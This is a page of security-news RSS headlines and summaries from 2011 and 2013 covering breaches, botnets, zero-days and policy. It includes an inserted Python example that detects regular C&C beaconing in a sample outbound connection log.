HotSec '11 will take place Tuesday, August 9, 2011, in San Francisco, CA. It is co-located with the 20th USENIX Security Symposium, which will take place August 10-12, 2011. We look forward to your submissions.

Patrick McDaniel, Pennsylvania State University
HotSec '11 Program Chair
hotsec11chair (at) usenix.org

==> Court order cripples Coreflood botnet, says FBI

http://www.infosecnews.org/isn.rss InfoSec News: Court order cripples Coreflood botnet, says FBI: http://www.computerworld.com/s/article/9216190/Court_order_cripples_Coreflood_botnet_says_FBI By Gregg Keizer Computerworld April 26, 2011 Although the Federal Bureau of Investigation (FBI) said a federal temporary restraining order has crippled the Coreflood botnet in the U.S. [...]

==> China Implicated In Hacking Of SMB Online Bank Accounts

http://www.infosecnews.org/isn.rss InfoSec News: China Implicated In Hacking Of SMB Online Bank Accounts: http://www.darkreading.com/advanced-threats/167901091/security/attacks-breaches/229402294/china-implicated-in-hacking-of-smb-online-bank-accounts.html By Kelly Jackson Higgins Darkreading April 26, 2011 This time it wasn't an "advanced persistent threat" associated with [...]

==> Is Iran just seeing Stars?

http://www.infosecnews.org/isn.rss InfoSec News: Is Iran just seeing Stars?: http://www.csoonline.com/article/680599/is-iran-just-seeing-stars- By Robert Lemos CSO April 26, 2011 An Iranian official caused a stir Monday, claiming the nation's cybersecurity experts found another digital attack aimed at the Islamic country's systems. [...]

==> Police: Wireless network hacker targeted Seattle-area businesses

http://www.infosecnews.org/isn.rss InfoSec News: Police: Wireless network hacker targeted Seattle-area businesses: http://www.seattlepi.com/local/article/Police-Wireless-network-hacker-targeted-1344185.php By LEVI PULKKINEN SEATTLEPI.COM STAFF April 19, 2011 Law officers have moved to seize a Seattle man's car they claim was used in a "wardriving" spree that saw Seattle-area wireless networks hacked [...]

==> New Workshop: USENIX FOCI '11 Submission Deadline Approaching

http://www.infosecnews.org/isn.rss InfoSec News: New Workshop: USENIX FOCI '11 Submission Deadline Approaching: Forwarded from: Lionel Garth Jones <lgj (at) usenix.org> We're writing to remind you that the submission deadline for the first USENIX Workshop on Free and Open Communications on the Internet (FOCI '11) is approaching. Please submit your work by May 1, 2011, at 11:59 p.m. PDT. http://www.usenix. [...]

==> The Rising Tide Of Cyber-Threats Could Engulf National Infrastructures

http://www.infosecnews.org/isn.rss InfoSec News: The Rising Tide Of Cyber-Threats Could Engulf National Infrastructures: http://www.eweekeurope.co.uk/comment/the-rising-tide-of-cyber-threats-could-engulf-national-infrastructures-27457 By Eric Doyle eWEEK Europe April 25, 2011 Cyber-attacks are increasing but national infrastructures are ill-prepared to defend themselves. [...]

==> DHS chief: What we learned from Stuxnet

http://www.infosecnews.org/isn.rss InfoSec News: DHS chief: What we learned from Stuxnet: http://www.computerworld.com/s/article/9216166/DHS_chief_What_we_learned_from_Stuxnet By Robert McMillan IDG News Service April 25, 2011 If there's a lesson to be learned from last year's Stuxnet worm, it's that the private sector needs to be able to respond quickly to [...]

==> Dataloss Weekly Week of Sunday, April 17, 2011

http://www.infosecnews.org/isn.rss InfoSec News: Dataloss Weekly Week of Sunday, April 17, 2011: Open Security Foundation - DataLossDB Weekly Summary, Week of Sunday, April 17, 2011. 45 Incidents Added. [...]

==> Phishing: Consumer Education Lacking

http://www.infosecnews.org/isn.rss InfoSec News: Phishing: Consumer Education Lacking: http://www.bankinfosecurity.com/articles.php?art_id=3571 By Tracy Kitten Managing Editor Bank Info Security April 22, 2011 The Oak Ridge National Laboratory, located in Tennessee, recently disconnected Internet access after hackers attacked employees at the federal facility. [...]

==> 2nd CfP: CRiSIS 2011: Risks and Security of Internet and Systems

http://www.infosecnews.org/isn.rss InfoSec News: 2nd CfP: CRiSIS 2011: Risks and Security of Internet and Systems: Forwarded from: Marius Minea <marius (at) cs.upt.ro> CALL FOR PAPERS [ PDF version at: http://crisis2011.cs.upt.ro/CRiSIS2011-CfP.pdf ] The Sixth International Conference on Risks and Security of Internet and Systems CRiSIS 2011 Timisoara, Romania, 26-28 September 2011 [...]

==> Phishing Attack Hits Oak Ridge National Laboratory

http://www.infosecnews.org/isn.rss InfoSec News: Phishing Attack Hits Oak Ridge National Laboratory: http://www.informationweek.com/news/government/security/229402048 By Elizabeth Montalbano InformationWeek April 21, 2011 The Department of Energy's Oak Ridge National Laboratory is investigating a sophisticated phishing attack that forced it to shut down email and Internet access last week. [...]

==> Spain to welcome the new Industrial Cybersecurity Center

http://www.infosecurity-magazine.com/rss/news/ Spain is addressing vulnerabilities in the cyber-hardiness of its critical information and communication technologies with the upcoming launch of the Industrial Cybersecurity Center (ICC).

==> Identity theft tops list of FTC complaints – again

http://www.infosecurity-magazine.com/rss/news/ There are lots of things to complain to the US Federal Trade Commission about (gas prices and financial lending practices spring to mind), but it turns out that, for the 13th year in a row, identity theft complaints top the list of things that US consumers want to pick a bone about.

==> Oracle patches two Java zero-day exploits

http://www.infosecurity-magazine.com/rss/news/ Oracle has released an out-of-cycle emergency patch for Java to address two zero-day vulnerabilities, including a recently reported issue that allows hackers to download the McRAT remote access trojan. This is the fifth Java update so far in 2013.

==> Samsung Android devices vulnerable to lockscreen bypass

http://www.infosecurity-magazine.com/rss/news/ Hard on the heels of Apple iPhone lock screen bypass woes, it turns out that Samsung devices running Android version 4.1.2 have a similar bug, which allows someone to get around the screen lock.

==> Companies failing to get a grip on BYOD

http://www.infosecurity-magazine.com/rss/news/ A new survey shows that companies with a BYOD policy suffer virtually the same number of BYOD security incidents as those with no policy at all, just a 5% improvement.

==> RSA 2013: Security is not keeping pace with threats

http://www.infosecurity-magazine.com/rss/news/ A survey of attendees at last week's RSA Conference shows that security professionals understand the changing threatscape, but that organizations are not necessarily keeping up with adequate defenses.

==> Trolling – academics look at an online sub-culture that verges on bullying

http://www.infosecurity-magazine.com/rss/news/ A new study by Nottingham Trent University suggests that nearly 60% of online gamers have at some stage indulged in activity described by the university as intentionally provoking or antagonizing users in an online environment (that is, trolling).

==> House, Obama Administration nearing an agreement on CISPA

http://www.infosecurity-magazine.com/rss/news/ US House of Representatives Intelligence Committee Chairman Mike Rogers (R-Mich.) said that his committee's negotiations with the White House on a new cybersecurity bill have resumed, with a draft for markup on target to appear in April.

==> Apple blacklists older versions of Adobe Flash

http://www.infosecurity-magazine.com/rss/news/ Apple has made the move to proactively block older versions of Adobe Flash Player in Safari and the Mac OS in the wake of an Adobe security advisory last week.

==> Newspapers more aggressive in demands for a share of search profits

http://www.infosecurity-magazine.com/rss/news/ German lawmakers have approved a bill aimed at protecting publishers' copyright, while New York's Associated Press is suing California-based Meltwater (a media monitoring company) in the US.

==> New survey suggests face-to-face is more important than technology for bank customers

http://www.infosecurity-magazine.com/rss/news/ A YouGov survey of more than 6500 people in France (1010), Germany (1053), Hong Kong (518), Spain (1006), the USA (1000) and the UK (2060) suggests that bank customers favor access to a local branch above technology such as mobile banking and social network banking.

==> China claims US-based hackers constantly target its assets

http://www.infosecurity-magazine.com/rss/news/ After a string of high-profile hacks on media sites and technology companies have had security researchers pointing the finger strongly in the direction of the Chinese military, Beijing has decided to turn the tables with a few accusations of its own.

==> Dropbox users wrestling with spam – again

http://www.infosecurity-magazine.com/rss/news/ Dropbox users have apparently become the target of a spam campaign, which is possibly a vestige of the data breach that the file-sharing service experienced last July.

==> Evernote hacked; 50 million passwords reset

http://www.infosecurity-magazine.com/rss/news/ Evernote, an online personal note-taking and archiving service, announced on Saturday that it had discovered and blocked suspicious activity on the Evernote network, and had consequently initiated a password reset for its 50 million users.

==> Stuxnet has been attacking Iran since 2005

http://www.infosecurity-magazine.com/rss/news/ The Stuxnet malware used to take Iran's nuclear program offline in 2009/2010 is actually two years older than previously thought.

==> YAJ0 – yet another Java zero-day

http://www.infosecurity-magazine.com/rss/news/ Researchers have discovered yet another Java zero-day vulnerability being successfully exploited in the wild against browsers that have Java v1.6 Update 41 and Java v1.7 Update 15 installed.

==> New setback for Dotcom in his fight against extradition to the US

http://www.infosecurity-magazine.com/rss/news/ In a relatively rare victory in its attempts to get Kim Dotcom extradited from New Zealand to face charges including copyright, racketeering, and money laundering, the US authorities have won their appeal against full disclosure of evidence.

==> Additional research also points the finger at China

http://www.infosecurity-magazine.com/rss/news/ A new paper presented at the RSA Conference in San Francisco this week adds further evidence to the growing belief that China is the source of a large amount of APT cyber espionage against the West.

==> Security framework looks to better secure hotel credit card data

http://www.infosecurity-magazine.com/rss/news/ In an effort to reduce the vulnerability of customer payment card information within the hotel and hospitality environment, Hotel Technology Next Generation (HTNG) has introduced a collaborative effort by the world's major hotel groups to create a security framework so that no hotel system would ever need to process, store or transmit payment card data.

==> Use a strong password and encrypt your phone, warns the ACLU

http://www.infosecurity-magazine.com/rss/news/ For once, however, this is not advice for defeating hackers and phone thieves, but advice on how to protect personal data from law enforcement's warrantless phone searches.

==> ISF Threat Horizon 2015 Report: The findings

http://www.infosecurity-magazine.com/rss/news/ But one new and emerging threat for business is reputation: cyber breaches don't merely lose data; the associated loss of reputation reduces corporate share value.

==> Par:AnoIA leaks 14 GB of data from Bank of America

http://www.infosecurity-magazine.com/rss/news/ Par:AnoIA (Potentially Alarming Research from the Anonymous Intelligence Agency) has released 14 GB of data that it claims was lifted from the Bank of America.

==> RSA 2013: Barracuda Ventures Launched to Fuel Startup and Technology Innovation

http://www.infosecurity-magazine.com/rss/news/ At the RSA Conference in San Francisco, Barracuda Networks has announced the launch of Barracuda Ventures, an initiative that supports startups with technology, capital, and mentorship.

==> Android spambot, blended threats top mobile spam threats in 2013

http://www.infosecurity-magazine.com/rss/news/ Mobile users are increasingly likely to be spammed. New research has revealed there were more than 350,000 unique unsolicited mobile spam variants in 2012, with the highest churn rate in December with more than 53,000 unique variants alone.

==> MiniDuke responsible for political cyber espionage in 23 countries

http://www.infosecurity-magazine.com/rss/news/ Government officials in more than 20 countries are feeling the effects of an Adobe-based exploit that hackers have used to drop the MiniDuke malware, tasked with stealing intelligence from political targets.

==> RSA 2013: CSA provides legal resources for cloud computing; issues list of top threats

http://www.infosecurity-magazine.com/rss/news/ The Cloud Security Alliance has announced several initiatives at this week's RSA Conference in San Francisco, ranging from privacy issues and legal information to the major threats relevant to the cloud security landscape.

==> NIST opens discussion on critical infrastructure security framework

http://www.infosecurity-magazine.com/rss/news/ In a move to bolster its quest to develop a set of voluntary standards and best practices for reducing cyber risks to critical infrastructure, the US National Institute of Standards and Technology (NIST) has issued a request for information (RFI) in the Federal Register.

==> FBI’s LulzSec informant Sabu gets second stay of execution

http://www.infosecurity-magazine.com/rss/news/ Hector Monsegur, aka Sabu, the former LulzSec leader turned FBI informant, was expected to be sentenced on Friday following a six-month reprieve. It didn't happen; instead he got a further six months' reprieve.

==> New emergency bug fixes for Adobe Flash

http://www.infosecurity-magazine.com/rss/news/ Adobe has released a new emergency out-of-band patch for Flash (the third Flash update this month and the fourth this year), fixing two vulnerabilities currently being exploited against Firefox and a third vulnerability that could potentially be exploited.

==> RSA 2013: The grey area of active defense – live manipulation of Kelihos

http://www.infosecurity-magazine.com/rss/news/ A live demonstration of active defense at RSA this week highlights the current debate on just how active (for which read offensive) companies can be in defending their networks. Laws to prevent hacking may also protect the hackers.

==> RSA 2013: Interview with security evangelist Stephen Cobb

http://www.infosecurity-magazine.com/rss/news/ Infosecurity Editor, Eleanor Dallaway, spent a fascinating 45 minutes picking the brain of ESET security evangelist, Stephen Cobb at RSA in San Francisco.

==> RSA 2013: Malicious data breaches result in significantly higher costs

http://www.infosecurity-magazine.com/rss/news/ New research from the Ponemon Institute confirms what many already suspected: malicious data breaches are far more costly than unintentional ones, to the tune of a 78% cost mark-up.

==> RSA 2013: Compliance Equals False Sense of Security, Says Vormetric

http://www.infosecurity-magazine.com/rss/news/ Compliance is responsible for a false sense of security, Alan Kessler, President & CEO, Vormetric, told Infosecurity at the RSA Conference in San Francisco, February 26 2013.

==> RSA 2013: Aadhaar, the Indian Electronic Identity Scheme, will change lives, says RSA keynote presenter

http://www.infosecurity-magazine.com/rss/news/ During the keynote sessions at the RSA conference in San Francisco today, Srikanth Nadhamuni, Head of Technology at UID Authority of India and CEO at Khosla Labs, presented Aadhaar, the identity scheme in India.

==> RSA 2013: Big Data has power to transform security, says RSA chairman

http://www.infosecurity-magazine.com/rss/news/ During his opening keynote at this year's RSA Conference in San Francisco, RSA chairman Art Coviello called 2012 a breakthrough year for the concept of Big Data, and then laid down his vision of how it can be leveraged to promote greater security.

==> Encryption has become a strategic rather than IT issue

http://www.infosecurity-magazine.com/rss/news/ The 2012 Global Encryption Trends Study, which surveyed 4,205 people in 7 different countries shows that in the US it is business leaders rather than IT departments that are now the more influential group in setting the enterprise encryption strategy.

==> Technology moves to make cloud synchronization / storage secure

http://www.infosecurity-magazine.com/rss/news/ One of the most worrying security concerns to come out of the growth of cloud computing and BYOD has been the extensive adoption of third-party file synchronization services, typified by Dropbox and Box, but also including other cloud services such as Drive and SkyDrive.

==> Six Strikes started to roll out yesterday

http://www.infosecurity-magazine.com/rss/news/ The Copyright Alert System (CAS), better known as 'six strikes', finally started its 'implementation phase' on Monday 25 February 2013. It is designed, say its operators, to reduce casual piracy on the internet.

==> RSA 2013: McAfee Announces Acquisition and Updates to Enhance Malware Protection

http://www.infosecurity-magazine.com/rss/news/ At the McAfee press conference in San Francisco, on the first day of the RSA Conference 2013, McAfee announced the acquisition of ValidEdge and 38 malware-focused updates to its anti-malware portfolio.

==> RSA 2013: As cybersecurity receives more attention, DHS becomes a critical player

http://www.infosecurity-magazine.com/rss/news/ With media coverage of cyber attacks proliferating, and public sector policy shops giving security increasing attention, the US Department of Homeland Security finds itself at the front lines of securing the nation's digital assets.

==> Congressman urges passage of the GRID Act

http://www.infosecurity-magazine.com/rss/news/ The Grid Reliability and Infrastructure Defense (GRID) Act is slowly gaining support in the US Congress, most recently from Representative Ed Markey (D-Mass.).

==> Big data analytics for anomaly detection in security

http://www.infosecurity-magazine.com/rss/news/ Big data analytics first evolved for use in marketing: by understanding the relationships between customers and actions, better marketing can be developed. Now the practice is being applied to security: by understanding the relationship between network anomalies and events, better security will evolve.

==> NBC hack serves Citadel malware to visitors

http://www.infosecurity-magazine.com/rss/news/ NBC has become the latest high-profile target for a cyber-attack, with its website, NBC.com, becoming compromised by the Citadel financial malware kit long enough to start serving malware to visitors before being corrected.

==> Chrome 25 stable channel released ahead of Pwn2Own

http://www.infosecurity-magazine.com/rss/news/ Google's Chrome 25 browser has now been promoted from beta to the full stable channel, fixing nine high-severity vulnerabilities in the process. Chrome, Firefox and Internet Explorer have now all had major security overhauls during February.

==> Latest (ISC)2 Workforce Study Shows Lack of Skilled Infosec Professionals and Developers

http://www.infosecurity-magazine.com/rss/news/ The problem is that not enough skilled people actually get into the profession; and all too often security is deemed to be separate from software development. These are the key findings of the sixth and latest study among the existing global security workforce conducted by (ISC)2, Booz Allen Hamilton and Frost and Sullivan.

==> UK users say regulators should be more proactive against Google’s privacy policy

http://www.infosecurity-magazine.com/rss/news/ On the eve of a meeting of the EU national privacy regulators (the Article 29 Working Party) in Brussels, a new survey suggests that two-thirds of UK users believe that more should be done to force Google to comply with European data protection laws.

==> Government maintains poor governance, concludes a new survey

http://www.infosecurity-magazine.com/rss/news/ A new survey of attitudes about information security within 277 UK public sector organizations, including the NHS, local councils, universities, trusts, central government and the police, highlights what can only be described as a lax attitude toward data security.

==> Nearly two-thirds of organizations are already infected with bots

http://www.infosecurity-magazine.com/rss/news/ 70% of those infections communicate with their C&C servers at least once every two hours, and more than half of organizations across the globe have had malware downloaded onto their networks via these bots.
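The survey figure above (bots checking in with their C&C at least once every two hours) is the kind of cadence a defender can hunt for in outbound connection logs: a compromised host talks to the same destination at nearly regular intervals, whereas a human-driven browser does not. The following detector is an added example for this page, not code from Infosecurity Magazine or the survey's authors. It assumes a simple constructed log format of `timestamp src dst:port` per line (the sample lines, hosts and addresses are made up), groups connections per (source, destination) pair, and flags pairs whose inter-connection gaps are short enough (default two hours, taken from the figure above) and regular enough (low coefficient of variation):

```python
import statistics
from collections import defaultdict
from datetime import datetime

# Constructed sample log, not real traffic. 10.0.0.5 beacons to one host
# roughly every two hours; 10.0.0.9 browses several hosts irregularly;
# 10.0.0.12 hits one host repeatedly but with no regular cadence.
SAMPLE_LOG = """\
2013-03-01T00:05:00 10.0.0.5 198.51.100.7:443
2013-03-01T02:04:30 10.0.0.5 198.51.100.7:443
2013-03-01T04:04:00 10.0.0.5 198.51.100.7:443
2013-03-01T06:03:50 10.0.0.5 198.51.100.7:443
2013-03-01T08:03:30 10.0.0.5 198.51.100.7:443
2013-03-01T00:12:00 10.0.0.9 203.0.113.20:80
2013-03-01T00:13:30 10.0.0.9 203.0.113.21:80
2013-03-01T03:40:00 10.0.0.9 203.0.113.22:443
2013-03-01T09:01:00 10.0.0.9 203.0.113.20:80
2013-03-01T00:01:00 10.0.0.12 203.0.113.30:443
2013-03-01T00:02:00 10.0.0.12 203.0.113.30:443
2013-03-01T01:30:00 10.0.0.12 203.0.113.30:443
2013-03-01T05:00:00 10.0.0.12 203.0.113.30:443
2013-03-01T05:03:00 10.0.0.12 203.0.113.30:443
"""


def parse_log(text):
    """Group 'timestamp src dst' lines into {(src, dst): [datetime, ...]}.

    The three-field format is an assumption made for this example.
    """
    flows = defaultdict(list)
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, src, dst = line.split()
        flows[(src, dst)].append(datetime.strptime(ts, "%Y-%m-%dT%H:%M:%S"))
    return flows


def find_beacons(log_text, max_interval_s=7200, min_hits=4, max_cv=0.1):
    """Return [(src, dst, mean_gap_s, cv)] for pairs that look like beacons.

    A pair is flagged when it has at least min_hits connections, the mean
    gap between consecutive connections is at most max_interval_s (7200 s,
    i.e. the "once every two hours" figure from the article) and the gaps
    are regular: coefficient of variation (stdev / mean) at most max_cv.
    """
    flagged = []
    for (src, dst), times in parse_log(log_text).items():
        if len(times) < min_hits:
            continue
        times.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        mean = statistics.mean(gaps)
        if mean <= 0:
            continue  # identical timestamps; nothing to measure
        cv = statistics.pstdev(gaps) / mean
        if mean <= max_interval_s and cv <= max_cv:
            flagged.append((src, dst, round(mean), round(cv, 3)))
    return flagged


if __name__ == "__main__":
    for src, dst, mean, cv in find_beacons(SAMPLE_LOG):
        print(f"possible beacon: {src} -> {dst} every ~{mean}s (cv={cv})")
```

Only the 10.0.0.5 pair is reported with the defaults; 10.0.0.12 has enough hits and a short enough mean gap but its gaps are wildly uneven, so the CV filter drops it. The check is deliberately simple: malware that adds random jitter to its check-in timer, or that beacons over many destinations, pushes the CV up or the hit count down, so in practice the thresholds are tuned per environment and combined with other signals such as destination reputation and byte counts.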

==> Attacks are evolving; but organizations’ deployed defenses are not

http://www.infosecurity-magazine.com/rss/news/ Although the most serious security threat has evolved from mass random attacks to specific, targeted and persistent attacks, the majority of companies have not evolved their defenses; many are still reliant on the old traditional security that was never designed to combat the modern APT.

==> Sophisticated banking threats branch out to other sectors – and get smarter

http://www.infosecurity-magazine.com/rss/news/ Sophisticated cyber-attacks originally targeting the financial services industry are now increasingly directed at other critical sectors of the economy, a new threat report finds, adding that there is also fresh cause for concern: the attackers are getting smarter.

==> New e-shop hawks stolen PayPal accounts

http://www.infosecurity-magazine.com/rss/news/ Hacked PayPal credentials are up for sale in the cybercriminal underworld, arranged in a fast and convenient e-shop format.

==> Cloud adoption is increasing, but privacy and security concerns remain

http://www.infosecurity-magazine.com/rss/news/ While enterprises overall are much more confident in the cloud than they were 12 months ago, security and privacy concerns continue to hold many back from widespread adoption of the model, according to a new survey of 200 US CIOs and senior level security decision-makers. On average though, respondents have moved about one-quarter of all their business functions and services to the cloud.

==> The car of the future will be recording everything you do

http://www.infosecurity-magazine.com/rss/news/ A very public row between the New York Times motor correspondent John Broder and Tesla Motors is entertaining motor enthusiasts and worrying privacy advocates. The NYT delivered a negative review, but Tesla had logged every part of the test drive.

==> European Parliament industry committee backs the EC’s Data Protection Regulation

http://www.infosecurity-magazine.com/rss/news/ While the EC has welcomed the opinion of parliament's industry, research and energy committee (ITRE) as the latest step towards a swift adoption of the proposed legislation, it is nevertheless not a complete endorsement: it rejects mandatory fines.

==> New report claims potential cost of a loss of trust is $400 million

http://www.infosecurity-magazine.com/rss/news/ The first in a new series of annual reports seeking to quantify the cost of trust (more specifically, the loss of trust) suggests that Global 2000 companies can expect a breach of trust to cost almost $400 million.

==> European Commission awards biometrics, data exchange contract for border control

http://www.infosecurity-magazine.com/rss/news/ The European Commission has awarded a €70m contract to a consortium led by Accenture for maintaining the European Visa Information System for the exchange of visa alphanumeric and biometric data across EU border management authorities.

==> Educause hit with server-side data breach

http://www.infosecurity-magazine.com/rss/news/ Educause, a non-profit community for IT professionals focused on the higher education vertical, is warning that a data breach has affected its 1,800 college and 300 corporate members.

==> 5 more critical fixes for Java released by Oracle

http://www.infosecurity-magazine.com/rss/news/ Oracle has updated its February Critical Patch Update to include five new fixes for Java that didn't quite make the earlier cut. The update is critical and should be deployed as soon as possible.

==> CSOs discuss practical approaches to BYOD

http://www.infosecurity-magazine.com/rss/news/ A new report from a group of CSOs discusses real-life attitudes and approaches towards solving one of today's most pressing problems: how do you let users attach their own devices to the corporate network without compromising security?

==> Google touts Gmail security

http://www.infosecurity-magazine.com/rss/news/ Spam continues to plague the world of email, but Google, for one, is touting the security of its Gmail platform when it comes to preventing account hijackings. In fact, the company said that it has reduced the number of compromised accounts by 99.7% in just under two years.

==> Apple becomes the latest hacking target, with Mac malware

http://www.infosecurity-magazine.com/rss/news/ The spate of media hacks that has claimed high-profile targets from the New York Times to Facebook has taken a bite out of a new victim. A range of Apple employees have found their Macs infected with a Java-exploiting malware that targets mobile app developers.

==> Too many merchants lack PCI compliance

http://www.infosecurity-magazine.com/rss/news/ Many merchants are failing to meet compliance with the Payment Card Industry Data Security Standard (PCI DSS), putting users' credit card data at risk. But the issue isn't complacency so much as obsolescence: too many stores and restaurants are in desperate need of equipment upgrades.

==> Using social identity as a form of single sign-on

http://www.infosecurity-magazine.com/rss/news/ Consumers are demanding convenient access to more services from more endpoints than ever and organizations need to be able to seize the opportunities that social identity, mobile computing, cloud and other trends naturally create, says Geoff Webb of NetIQ.

==> Security firm accuses Chinese military of involvement in worldwide hacking

http://www.infosecurity-magazine.com/rss/news/ Mandiant, a security firm with a close relationship with both the US and UK governments (one of the five companies in GCHQ's new Cyber Incident Response scheme), has made the clearest statement yet: the Chinese military is behind the hacking team known as APT1 (aka Comment Crew).

==> French data privacy regulator plans to take on Google

http://www.infosecurity-magazine.com/rss/news/ France's National Commission for Computing and Civil Liberties (CNIL) has warned Google that its response to earlier demands over its privacy policy is inadequate, and that an action plan against Google would be discussed by the Article 29 Working Party of EU national regulators on February 26.

==> We can’t block YouTube, Egypt’s telecomms authority tells the court

http://www.infosecurity-magazine.com/rss/news/ On February 9, Egypt's Judge Hassouna Tawfiq ordered that YouTube be temporarily banned in Egypt for 30 days following Google's refusal to remove the Innocence of Muslims video from YouTube.

==> UK’s Nursing and Midwifery Council fined £150,000 by ICO

http://www.infosecurity-magazine.com/rss/news/ The Nursing and Midwifery Council is the latest public health organization to be fined for the loss of personal and sensitive information in breach of the Data Protection Act.

==> What will the future of enterprise security look like?

http://www.infosecurity-magazine.com/rss/news/ With the year 2020 approaching, join our panel of experts, who will examine what near-term advances in information technology may hold, and how enterprises can get ahead of the security curve in anticipation.

==> Facebook is the latest media company to admit it was hacked

http://www.infosecurity-magazine.com/rss/news/ On Friday Facebook admitted to being just another hacked media company, joining the New York Times, Washington Post, Wall Street Journal and Twitter in admitting a recent breach, although Facebook claims that no user data was lost.

==> ZeroAccess is top bot in home networks

http://www.infosecurity-magazine.com/rss/news/ When it comes to buggy home LANs in the US, the rate of home network infections actually decreased from 13% to 11% in the fourth quarter of 2012, translating to about one in 10 households. But of those, 6% exhibited high-level threats such as bots, rootkits and banking trojans, while moderate-level threats included spyware, browser hijackers and adware.

==> Majority of Americans fear cyber war is imminent

http://www.infosecurity-magazine.com/rss/news/ A national survey of Americans shows that a majority fear that cyber warfare is imminent and that the country will attack or be attacked in the next decade. In addition, Americans believe both the government and private sector networks are ill-prepared for a surge in cyber conflict.

==> Apple iWatch could replace passwords

http://www.infosecurity-magazine.com/rss/news/ Ever heard of the Apple iWatch? Recent news reports are claiming that Apple is branching into wearable computing with a smart watch worthy of James Bond, usable for everything from recording conversations to acting as a personal assistant.

==> The zombie apocalypse is more than just a prank – it’s a wake-up call

http://www.infosecurity-magazine.com/rss/news/ On Monday a few TV stations in Michigan, California, Montana and New Mexico broadcast a warning: the bodies of the dead are rising from their graves and attacking the living.

==> Jeremy Hammond's legal team seeks judge's recusal

http://www.infosecurity-magazine.com/rss/news/ Hacker Jeremy Hammond is accused of being part of the Stratfor breach. Presiding judge Loretta Preska's husband, Thomas Kavaler, appears on a list of Stratfor victims. Hammond's legal team says this creates an appearance of partiality, and has demanded that Preska be recused.

==> Bug in iPhone 5’s iOS 6.1 bypasses lockscreen

http://www.infosecurity-magazine.com/rss/news/ A bug in iOS 6.1 allows a hacker with physical access to an iPhone 5 to bypass the LockScreen defense to gain access to the phone app and place calls, listen to voice mails and view photos in the contacts section.

==> PCI Council releases mobile payments security guidance for merchants

http://www.infosecurity-magazine.com/rss/news/ The PCI Security Standards Council (PCI SSC) has issued fresh mobility guidance, urging merchants to take a holistic view of the factors and risks that need to be addressed in order to protect card data when using mobile devices to accept payments.

==> 20% of enterprises fall victim to APT attacks

http://www.infosecurity-magazine.com/rss/news/ Advanced persistent threats (APTs) are perhaps the most wolf-like of cybersecurity threats considering their stealthiness, and a new survey has discovered that APTs are making the chickens nervous.

==> Healthcare data breaches wane in 2012

http://www.infosecurity-magazine.com/rss/news/ Healthcare breaches were among the most high-profile of data leakage incidents last year, but a new study in the US found that the damage is actually lessening year-over-year.

==> Cyber-espionage hacktivist campaign targets China's Uyghur population

http://www.infosecurity-magazine.com/rss/news/ A fresh cyber-espionage campaign against China's Uyghur community has been uncovered that infects Mac OS X systems using spear-phishing mails. The politically motivated malware then sets about stealing information from hard drives.

==> IT departments don't trust their own security choices

http://www.infosecurity-magazine.com/rss/news/ Curious as to the state of security when it comes to enterprise data? Consider this: one out of five enterprise security professionals in the US say they would not entrust their personal data to their own networks.

==> DDoS vs DDoS mitigation – the latest arms race

http://www.infosecurity-magazine.com/rss/news/ Distributed denial of service (DDoS) attacks are one of the more serious threats faced by business today, and DDoS mitigation services are a security industry growth area. New malware attempts to mitigate the mitigation.

==> Security is not my responsibility

http://www.infosecurity-magazine.com/rss/news/ At least, it is the security team's responsibility while I am at work, although it is my responsibility while I am at home: so concludes a new survey into attitudes toward phishing.

==> ACLU: Obama's cybersecurity executive order is privacy-friendly

http://www.infosecurity-magazine.com/rss/news/ President Obama has signed an executive order to protect US critical infrastructure from cyberattacks by improving cybersecurity information sharing between the government and owners/operators of the nations critical infrastructure. Meanwhile, the US House of Representatives is reintroducing the Cyber Intelligence Sharing and Protection Act (CISPA), which passed the House during the last Congress but failed to gain traction in the Senate. According to the ACLU, when it comes to privacy, one of these things is not like the other.

==> Reveton ransomware gang busted by Europol

http://www.infosecurity-magazine.com/rss/news/ The new European Cybercrime Centre (EC3) at Europol, working with the Spanish police and Interpol, has made its first major bust: the Reveton ransomware gang.

==> Latest PDF being exploited – beware of what you open

http://www.infosecurity-magazine.com/rss/news/ Adobe has issued a new security advisory for Adobe Reader and Acrobat on vulnerabilities that are currently being exploited in the wild. The advisory offers a workaround while a patch is being developed.

==> Research shows “dramatic growth” in global cyber attacks

http://www.infosecurity-magazine.com/rss/news/ Data from Websense Labs has identified a dramatic increase in cyber attacks during 2012, led by an astounding 600% increase in malicious web links detected by the company's ThreatSeeker monitoring network.

==> Infosecurity Magazine Launches Information Security Hub on The Guardian website

http://www.infosecurity-magazine.com/rss/news/ Information security is rapidly moving up the board agenda, particularly in light of proposed EU legislation that would compel companies to report cyber breaches. Neelie Kroes, Digital agenda commissioner has said that Europe needs to improve how it deals with cyber security. The concern for businesses is the impact that reporting breaches might have on their corporate reputation and the bottom line.

==> Dropbox chases the corporate market with improved facilities and security

http://www.infosecurity-magazine.com/rss/news/ Dropbox is reported to have around 200 million users; but the majority of these use free accounts and comprise shadow IT (unsanctioned IT) within their companies. Now, with a new dashboard and functions, Dropbox Team seeks the corporate paid-for market.

==> President Obama signs the Cybersecurity Executive Order

http://www.infosecurity-magazine.com/rss/news/ "Earlier today, I signed a new executive order that will strengthen our cyber defenses by increasing information sharing, and developing standards to protect our national security, our jobs, and our privacy." Obama, State of the Union address, Tuesday.

==> Former Symantec CEO joins FireEye board

http://www.infosecurity-magazine.com/rss/news/ Enrique T. Salem, former Symantec president and CEO, has joined the FireEye board of directors, the company announced today.

==> Retail sector leads the pack for worldwide data breaches

http://www.infosecurity-magazine.com/rss/news/ Shopkeepers, beware: The retail industry is now the top target for cybercriminals, accounting for 45% of security firm Trustwaves data breach investigations last year (a 15% increase from 2011). Overall in 2012, nearly every industry, country and type of data was involved in a breach of some kind, with cybersecurity threats increasing as quickly as businesses can implement measures against them.

==> Five-month malvertising campaign serves up silent infections

http://www.infosecurity-magazine.com/rss/news/ A large malvertising campaign has been serving up malware infections via web advertisements from online marketing services for at least five months, a Symantec investigation has revealed.

==> Data breach incidents more than double, but record exposure declines

http://www.infosecurity-magazine.com/rss/news/ The number of global data breaches reached 2,644 last year, more than doubling the number of incidents in 2011. Despite the rise in frequency, they accounted for the exposure of 267 million records, a significant improvement over the 412 million records exposed in 2011.

==> Online authentication boosted by the launch of Nok Nok Labs and FIDO

http://www.infosecurity-magazine.com/rss/news/ Nok Nok Labs, a company that seeks to answer the question "who's there?", launched today in unison with FIDO, a new industry alliance developing open, standards-based authentication mechanisms.

==> Will DRM spyware be built into the next Xbox?

